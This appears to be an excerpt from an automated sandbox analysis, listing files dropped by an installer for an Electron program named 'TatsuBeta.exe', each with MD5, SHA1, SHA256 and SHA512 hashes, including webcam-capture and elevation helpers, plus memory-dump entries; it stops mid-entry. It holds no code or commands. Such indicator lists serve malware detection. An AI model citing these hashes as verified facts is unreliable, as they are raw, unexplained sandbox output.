C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar

MD5 f43c24844ea31e2541f7f557db8066fc
SHA1 58888f8dbc9c2e1292dfe51b5a328d06d9c72c44
SHA256 cae78fed8f6830a87070d423a92b07cf7fb5854611aa499a2024e8116cd3a2ec
SHA512 cb6a1b2a95fafb2bf15f8e75fc5c8390246fc6b35a1ce912ff7dd63bf4bd195dc2b83f226a683f8ab6a1ceb6a7bbdda46baf7cd4dd36413a44205ac62e2854ff

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 bd731e6063a21fc3b9b860b8deef659f
SHA1 008314b227102435f6eeb80580e5f8f9af23697a
SHA256 26d55e3a5425027415a99a9eecd01ae68e11c09b9510ace5e348a7be5dc6fac1
SHA512 0a1613afa144bd1c8425df96b7340dca2d63180c97c6806b8a6d34b61f1488308e3f1e16c2499454138f4d1d65c5394f7790097efe648a69607ac42315168235

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 a0d8cb8cbb792e823b9d4ce49c5d61ed
SHA1 af3efbe7ea29ae5a217ffc02b1d8cc338e5ad3a2
SHA256 3be9e138931cb5d12bc75c49e3c0a44adac84be33f762da8848f05e1d3d0cbba
SHA512 f745a981c5fb88f78cdd441b56c6b8fa64e9d4a6b161c123b6815fc6b4b6055ffff572605cc4b84bcf03215c601b42d1d298062df379c555f3350716174d1abc

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 a90080582d11d5648031092138b10e27
SHA1 ecd757858bc1397cd51532dcc148e005cd05ee03
SHA256 c69f6b4de6afbadd09acbed6bf4d78bc66cd102f6ebca0abf4e4ede71b249168
SHA512 c3cc5c830944802d95b4c8684b067c13adb539321ac3084e63a0b4afa162269e6d06fe8019342942ef507d3b0a688272107486c09b60fb42f6a9d1e40bf73d02

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 7ef13ad215b09716d73dbdb97dcf41a5
SHA1 51d6bf57a87c556247a898be24fe2cd0515d3d95
SHA256 660164846589244561516bb0e32d1cfeb172ef266cce17ae08666cf87f4c6cd8
SHA512 8efd6c04f0d2a2ed77e32b2ee7b56f9249e3243254a593a0ec420650a94e1b2c932b9bf50c16cc341c1ae8951244dfce9188a626ca54af63d68265def2f3c54e

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 534edbfb3cc1e908f3aa028373e9e408
SHA1 cb13b3d01895e1074642b479337e2dfd37570dfa
SHA256 a9fe32677e3b63d6126baaa525c3fe73b3c09eab7b4074ab3cd00ac4612d6dfb
SHA512 cd36ef9d07d3f22e0cd7a1380743ae54e6cd66efe2706c11a3e988dcab4cf0b23fcca75440afda37d3134849f0c9343550181e59fbdad55bf5e4b0757292dda9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 ca08047f89ed56f23cfcf7d088566ac8
SHA1 3d711e3bba9e267db181a31bc72dd19e728808a1
SHA256 584a71007854a206ab6255c90d76acf21973dc3972c986a69871ed78cf0ea33f
SHA512 f3cf0f000edf912f3778a25a0802b16b8671f11ce5d6333c564d5e5cb18db2ad150ebdf9d8ab2dda5fe0f4eef935c4513f8c0160be09d4a738d8e3951a49d348

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 f4e7177f86f639b5c5a2a6157fe651cf
SHA1 76c09ddb551b297ec73d5b3615249902f2f244e6
SHA256 ee046745a96b2bf98823b7aea0b5734ff503205d7a221bd2dc517388bcba11da
SHA512 875b442c2d7e449366744acd898cd6b29e0a89e8106ed250a224c8410ad1fd9463b405f13e392bada92cf4a4f4b223e865b3584afc3529e0fe800269d976725b

\Users\Admin\AppData\Local\Temp\18078ff1-2bd6-42b5-be14-49e4f3753898.tmp.node

MD5 06d61b44b2a91625ca44b18b9c9b0f61
SHA1 417a9140185702173395e0489f335bfcd165d924
SHA256 30e616361591e80f23f0d959193aa4c9c8d682c8529d5a92a5c07595f35a3ca5
SHA512 d4fbce4eaf1dbd2d62dd0bfdd639d2ee92d1b219160768be3dfc7856f275c0c31af4dabba639bb55fd85584ed9f251af5f412ba8f9adb1d88e32dc69ba7a3007

\Users\Admin\AppData\Local\Temp\50b193d3-c9de-44c5-aac1-48207281878e.tmp.node

MD5 a0897e8ca305447b833e25948d93d13b
SHA1 4fbcd3e06dc2fec00ab4f75c0a530f249a7d3b5f
SHA256 22fbd8ca172c1c98cdb9306aa13543644c5cc566ac1a7d3e05f717011f95aa1a
SHA512 c26341b0683a822c119fd1c181011697d516704b90e7261b1c43e7c871b937c70e30a0f23e669fabddd6a226c5309aa31c0e26971b1383bb9a4d184d44fd4e26

memory/1516-580-0x0000000000060000-0x0000000000061000-memory.dmp

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 6a99b28e651f4861d3c973756f9767c4
SHA1 1e7caa1ef68801c2c14fa362376c7b7a1a64f1e4
SHA256 f578e7dba75d962f407f8de1355a1def6d640938023330848dda0b693ef678bc
SHA512 ad09918365b9d0f2d35cb1db795499fb128ba45c95e22a2bd2be29c9a0c25bf308d5ade9760b105d7ca59be2a0baa37aa69f43890b7d8520d2ca6ebde7daa6f7

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 1161c5968fcd7d0cadcbc5886d2bffcb
SHA1 7259e3be249209ea1e079770df3ca32c4bfbb145
SHA256 6444b4927ffe6c5823149c50293f1b554082b460a96c4f919f56e9a09866abb8
SHA512 c85d74b75761e59b1947afc706cf5ae717fb4523a78e42b5abc93ef8ddbb12734aa1fc4fc704f5e7f39ac68055ce34ab0713e5699709359ef31ce1448edea67c

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 ce2d5c2049ff5a8859c261af49c36810
SHA1 1fe44dc1aa966f984296963fb051a53aeefc8dc8
SHA256 27676fe48791ef3bc90916526b814bc6aea07f23dfab87f629f9bd9597f76586
SHA512 0a572d37f483fb7295c82a4d756d0d866368a32590be670563471336ba56ae7ca146cb7f2c5e0eb6b8f007e3e99a62fb75b9ccdd8f546b2d4cd2604d1f085b1b

memory/1516-614-0x0000000077140000-0x0000000077141000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 e5fb73cffe0c1e4743d797206288dc05
SHA1 db68174f75f467d6ee91ce7ab2a9fa7d76e97221
SHA256 e6dabff830558ee4d0e1674bd3065172edb7acebdb9bd484796b9cd1b8de12f5
SHA512 72608bff956bffdafbe6ee72469fb1d062b407615bfee5ab2b7dcc8f0d6fa1022e412746bdc20b48f57943f443845c0b73d25397635199846135c23068294e79

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 20b2416923a830ba744f9ede4e24f21c
SHA1 3c53fff426e9a74d21123cfff58c82317f539549
SHA256 9d440fda454f8042f510faf77c8f01be2d0f496fcbc4c585cad29f76ac6a47c2
SHA512 e9b4683febb699abc6eb302085201aa2e61a6d2d1505a6fdc28dae806c23dbadea34221d566ee3e0f00ee865fec5d6cfd22356b1d6f6a34eadcdc9243660b9d1

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 aee28307af92a83137d14c48670ef00a
SHA1 cb4ee23641711c117b8d78926e4cb71e809384c8
SHA256 ccd2f300f2e26cce4e02e99824d11f29c58485cf08f9259c3d5be7410c15715a
SHA512 b9c5e8e27b57bb748ed5a73b5d3864659bb853092780135dac971452ecfbd99813e971883de6072536c4820d776c80602293eb1ccd0d65ced3c836d48226739c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 006a090b3ffc6d5a22e21e345dbee8c3
SHA1 96a730812ecfbe7addcf1bfa0fbee746cac17afd
SHA256 7aadaf291d73ca07344611aeeaa3a40c5e48edbcef05a10cd6021f59a303c592
SHA512 e40015141d8a6dd66a33e3d79f537d434e9d23551fa64d3ec3e94454f92a46713fdf2f3e70dcaafc2bf00a7e0c7d769a5a5b6c42256ccff71c45b8fbb0a06fa3

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 246323c83b7360d65170010b0fcfb8af
SHA1 4d38f14263d2b8d28324c458dfe7bc97a0077a18
SHA256 e513f752dc1523876ec8718cf2990f2c3f5d42e3afa64e5db849e390f8902990
SHA512 0c30de1dd3f29e19a6a6f8a38ff340cb22a42f3f27257bac33e4ee2d1cf337ba0c2720848f5dc554d060d55dd96a5f4cc97d314a76903b55ea4e6dccdfe08d41

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libegl.dll

MD5 d5b5c56d07b910a916ad4a2466491155
SHA1 ecbc7fba42da16fda7645560deabcbe2588d6663
SHA256 6829f5e6d07c22fa8500d5d7d49be1f346f1f3a344ba7e7b48dc066c15a39814
SHA512 c07761caf42868f9801cf38edcbaf6c1e2615fe8fb939d97c803a3ee05eca939a0e19c95e5b09bcb606a3061c1be1c4ed21b5746d220ace2d47bdf355f8e2f1e

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 9689d84f082f34c82834f71a3666ca85
SHA1 c6310b362e97e73e66fec21a57ef3e8bf39af0dd
SHA256 115020ac0a80ee6dd11d34e8bb7601f223e7224271b26b266288522d16a144e2
SHA512 ee6d37e397f8e8d17b011943c31a651878277cea7e67ea5e2e234b7a1d8d975661ba6b8e28408f6de6b99b12c378ed01454a8584234be845e4e1a21c253c6799

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 4b5cfb998559202302ccfbf4a9c064bc
SHA1 3841fc016cc772e069c7faf824f744fca1cd71f4
SHA256 0e47b84254a33683bffe55d79300f7407d48e0246d052375f699a585f480b4ad
SHA512 cdf5fd875c113c4548c1682adad21b9b9f7e016bdee4816295a3a41f0544b57142bf304a4754cfd5f0058b46f1d79a1aa0e9adeb547f011b2856ab297524e46c

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 1582e71b0982ff896500c03e7a7103a4
SHA1 71fad6ee92e54e7236614ac87749c44e708e5cec
SHA256 a0e69f6e17c1ccecb174f60ea5bc554cb00ae42be7c5bcf59eabafda787c3190
SHA512 45e8891c40130a0b9f8a2c7b2df7b2dcb8ccf285e2a93fd3b9e02283e7ff68238bcfd22d98d23f4af7fe59bb4750c2ecf186912cac80d34c0aad79c8f0c682fb

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 a5467eafde19b86759b74ce6ef90ffb9
SHA1 b4152212dea829aae7679552ce9795b0e8f65c9e
SHA256 12c8193a0ebb4b504d5aff065c773b8f0053a78df60b654448ecf6f98eb630b2
SHA512 6b7c2ef815273c0a4ab2da752633293f25e370bc411d8a7398e3f317ecede3cf8e78222b184b71ee3f3bb57072917774c64b9bcadc982e73c3ba2ac61683c81a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 e5add1788407c8c40b5dea4fae2d6764
SHA1 39f8969a0c467ce73e3fdb07d231c38d8eea0613
SHA256 152a28673d0a168fd43ccbfbe881b71183c233b70e4d84af2fc929484a647ebf
SHA512 253ab5fecd5d4e42b6f78fc0ae989b8e4dc176922fdb36cdfc4a382e044045931823f430a1cc9bc1f5d0fb950b5c1158a123fa991b4b530bebad9465e8ddff95

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 0733d6b1773d4f171bcb573b4e349d1c
SHA1 2b11373b5c7848df3e076d1533c3125989a1c7df
SHA256 fb2671eea34a4e22f2427512f8aa85b579fa3f3d975367938f11047d003400da
SHA512 93c3268d682b1b514ebe3b0a28f3837e22e8e5854c2a271eefd09be8b7726f5fbfe198655787f638bf1405b9177254906f1917814bb0b18bea22156eb5e78f3e

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 2895539eb21b007bad9adddeeb201755
SHA1 8bade4af1bcfecd9afaa799b8909f20489cf98be
SHA256 91aaddf191ec6f1ce2783903c7654bba5eee52dbd41beb5242ab452bf5f70bfb
SHA512 21b82228c9f3425b319355cfc553ed655907bcbeae4f14fd07db5b33e27e15509a69cb95bbc4bb1246f6dea0fcde9880d74e928500c8f84439a8400ce235fe59

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 1696a32a6eafacad3b0ffe653a46be4c
SHA1 634b9664372e33bca123df47b82cc79361a7772d
SHA256 5072692284447914bc6c2cf80c47f6b4e31a7c775c536f1eca0e5b8cc229add4
SHA512 2e4ca2d7121e00ed1d3ed0877c2fb8e7950c15ce0036ad915880a76faf6003ef94a371d66b0e4deea85be37c04a74f8385d80c6a7ee73f6c11a8916708d92170

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vulkan-1.dll

MD5 c61085e8e52d7c821b15e1d059bd16a5
SHA1 758329a9e5924d8eca9bd3e8cb9d34e56c785a24
SHA256 bcae6ea1464450c6fc2b4aecd3fb08cf257cdbbf12f876ba29a8361245f4853c
SHA512 4aabc936c2ca81e996ee77ca4b4d1a84e3b82b349ef6216522f02ceaf9355f855a0c27ee5eefc85d0804141d6ead1822c784b45312a18488a7363ef7864e411f

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vulkan-1.dll

MD5 4daf8b98c3fe52475e81a5151b193ff8
SHA1 65658a869213ad76200cdfaae9e7a067da4383e3
SHA256 cf32694fccae6ab10ad32ce435ce6a83e48f4c9a0cdbcddc5831c8d6165d4bc6
SHA512 e1f54492163b50eed228d26f2fae4c7fdcd99ab8d7a0d869e1fd7509d4d5c576f901f342cac9435f925ad5f11f011816db8db07324b1286dabbfc4fbd2482771

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 abdca9274aefa10c25eb154df001e0cb
SHA1 6ae99cebd5bdb4755182ea0d34ba237b0b1eb01b
SHA256 6cd0e78dad1d39ffd7628c331b7a7a56059c60eef591c0932d04683bf8141e5c
SHA512 4a5c8b87bc4cd3d7a649c7bec33d440cc8f7e11b3c6866d0cf4cec4ee0a62c08bf4edbfd1c3c2f5ee507f4a41c271e2b5b6d6147a9e0538aeeb71dc54657cf8f

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 4b3756ffbd7ea69b20215f271caa7fee
SHA1 97a68b1281c308bb69fd5d7df27445acec5856b8
SHA256 9f0e34fc1705658d78f2b573650da16d430b946663fb40b45b36f5a0f11b35aa
SHA512 a015330610f33a5541a87a5ea01429abcfd8eb6a834346bf506d3f45e3cdab5f12c5b471c878ecf347e84223c154caf96ca5f726351851cfbcb89c38f1c650eb

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 2508480461ef339c9349c923c8deb2f4
SHA1 73ffc4c2c7ce9d06e7452a0990246fb941e686ad
SHA256 a96c8c38f881056748016a58ec4370dfff61ef1e44aea1397f7a5efb82f2c9ad
SHA512 3f92398ee0bc4bafa2687efc74d7fb3c8f94e92a82ecfa37807a3989b041dae099fa6b78c4c0adf31eb0eb0fd2bacff3456cb41f1a348f5c0ab2e962bb4a8f3d

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

MD5 aab7e9b2a0a60c5fa20d3f251ad9fa16
SHA1 b194326cca7d36c88bb0788c1e627d45836028dc
SHA256 366c2696ab88da7e7e07363c5efd86ef3cc54b6f633cfae6ab38cf40bc097aa7
SHA512 0c7ef038560ea79e781b11225bb6f862cba8b940cc2996f2fa97353f464efb217faf002388e53e82824c7f6bad30aa1b5f9fdcdd68d7747cc7b0782dfc483459

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

MD5 ebf84d41b32b23fd439e83df811eb2ae
SHA1 1dac3cc798a1ac0cc790e00d3a403ed8b6b155fa
SHA256 7f7faaee8ff84f3425c7848c9d143fb5b9e7e731d6589a25f510756125daf867
SHA512 f8512082980927c5a268b3852c022f7e365000df5eff685adc23ae962941d93e8316ff3341e587d6bcae32cd170903caf2ddf291de228f8f28ee31392cc8e383

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

MD5 1ebc240d792e0ced2e1ce66aa9389bbc
